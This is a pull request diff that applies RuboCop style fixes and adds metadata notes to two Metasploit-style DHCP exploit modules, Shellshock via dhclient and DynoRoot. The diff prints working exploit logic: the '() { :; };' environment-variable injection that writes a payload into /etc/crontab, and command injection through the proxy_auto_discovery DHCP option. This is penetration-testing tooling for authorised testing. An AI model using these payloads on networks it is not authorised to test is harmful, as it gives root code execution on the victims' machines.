### PR TITLE
modules/exploits/unix/dhcp: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/unix/dhcp/bash_environment.rb
+++ b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -3,34 +3,33 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::DHCPServer
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Dhclient Bash Environment Variable Injection (Shellshock)',
-      'Description'    => %q|
-        This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
-        handles external environment variables. This module targets dhclient by responding
-        to DHCP requests with a malicious hostname, domainname, and URL which are then
-        passed to the configuration scripts as environment variables, resulting in code
-        execution. Due to length restrictions and the unusual networking scenario at the
-        time of exploitation, this module achieves code execution by writing the payload
-        into /etc/crontab and then cleaning it up after a session is created.
-      |,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Dhclient Bash Environment Variable Injection (Shellshock)',
+        'Description' => %q{
+          This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
+          handles external environment variables. This module targets dhclient by responding
+          to DHCP requests with a malicious hostname, domainname, and URL which are then
+          passed to the configuration scripts as environment variables, resulting in code
+          execution. Due to length restrictions and the unusual networking scenario at the
+          time of exploitation, this module achieves code execution by writing the payload
+          into /etc/crontab and then cleaning it up after a session is created.
+        },
+        'Author' => [
           'Stephane Chazelas', # Vulnerability discovery
           'egypt' # Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'Platform'       => ['unix'],
-      'Arch'           => ARCH_CMD,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix'],
+        'Arch' => ARCH_CMD,
+        'References' => [
           [ 'CVE', '2014-6271' ],
           [ 'CWE', '94' ],
           [ 'OSVDB', '112004' ],
@@ -39,28 +38,26 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ],
           [ 'URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/' ]
         ],
-      'Payload'        =>
-        {
+        'Payload' => {
           # 255 for a domain name, minus some room for encoding
-          'Space'       => 200,
+          'Space' => 200,
           'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic telnet ruby',
-            }
-        },
-      'Targets'        => [ [ 'Automatic Target', { }] ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2014-09-24',
-      'Notes' =>
-          {
-            'Stability' => [CRASH_SAFE],
-            'SideEffects' => [],
-            'Reliability' => [],
-            'AKA' => ['Shellshock']
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic telnet ruby'
           }
-    ))
+        },
+        'Targets' => [ [ 'Automatic Target', {}] ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2014-09-24',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION],
+          'AKA' => ['Shellshock']
+        }
+      )
+    )
 
     deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
 
@@ -68,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_new_session(session)
-    print_status "Cleaning up crontab"
+    print_status 'Cleaning up crontab'
     # XXX this will brick a server some day
     session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")
   end
@@ -78,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Quotes seem to be completely stripped, so other characters have to be
     # escaped
     p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }
-    echo = "echo -e #{(Rex::Text.to_hex("*") + " ") * 5}root #{p}>>/etc/crontab"
+    echo = "echo -e #{(Rex::Text.to_hex('*') + ' ') * 5}root #{p}>>/etc/crontab"
     hash['DOMAINNAME'] = "() { :; };#{echo}"
     if hash['DOMAINNAME'].length > 255
       raise ArgumentError, 'payload too long'
@@ -88,8 +85,6 @@ class MetasploitModule < Msf::Exploit::Remote
     hash['URL'] = "() { :; };#{echo}"
     start_service(hash)
 
-    while @dhcp.thread.alive?
-      sleep 2
-    end
+    sleep 2 while @dhcp.thread.alive?
   end
 end

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -9,29 +9,29 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::DHCPServer
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'DHCP Client Command Injection (DynoRoot)',
-      'Description'    => %q{
-        This module exploits the DynoRoot vulnerability, a flaw in how the
-         NetworkManager integration script included in the DHCP client in
-         Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
-         processes DHCP options. A malicious DHCP server, or an attacker on
-         the local network able to spoof DHCP responses, could use this flaw
-         to execute arbitrary commands with root privileges on systems using
-         NetworkManager and configured to obtain network configuration using
-         the DHCP protocol.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'DHCP Client Command Injection (DynoRoot)',
+        'Description' => %q{
+          This module exploits the DynoRoot vulnerability, a flaw in how the
+          NetworkManager integration script included in the DHCP client in
+          Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
+          processes DHCP options. A malicious DHCP server, or an attacker on
+          the local network able to spoof DHCP responses, could use this flaw
+          to execute arbitrary commands with root privileges on systems using
+          NetworkManager and configured to obtain network configuration using
+          the DHCP protocol.
+        },
+        'Author' => [
           'Felix Wilhelm', # Vulnerability discovery
           'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'Platform'       => ['unix'],
-      'Arch'           => ARCH_CMD,
-      'Privileged'     => true,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix'],
+        'Arch' => ARCH_CMD,
+        'Privileged' => true,
+        'References' => [
           ['CVE', '2018-1111'],
           ['EDB', '44652'],
           ['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
@@ -41,17 +41,17 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
           ['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
         ],
-      'Targets'        => [ [ 'Automatic Target', { }] ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2018-05-15',
-      'Notes' =>
-          {
-            'Stability' => [CRASH_SAFE],
-            'SideEffects' => [],
-            'Reliability' => [],
-            'AKA' => ['DynoRoot']
-          }
-    ))
+        'Targets' => [ [ 'Automatic Target', {}] ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2018-05-15',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'AKA' => ['DynoRoot']
+        }
+      )
+    )
 
     deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME')
   end
@@ -61,9 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
     start_service(hash)
     @dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")
 
-    while @dhcp.thread.alive?
-      sleep 2
-    end
+    sleep 2 while @dhcp.thread.alive?
   end
 
   def cleanup


### PR DESCRIPTION
All violations resolved with `rubocop -a`, except notes.
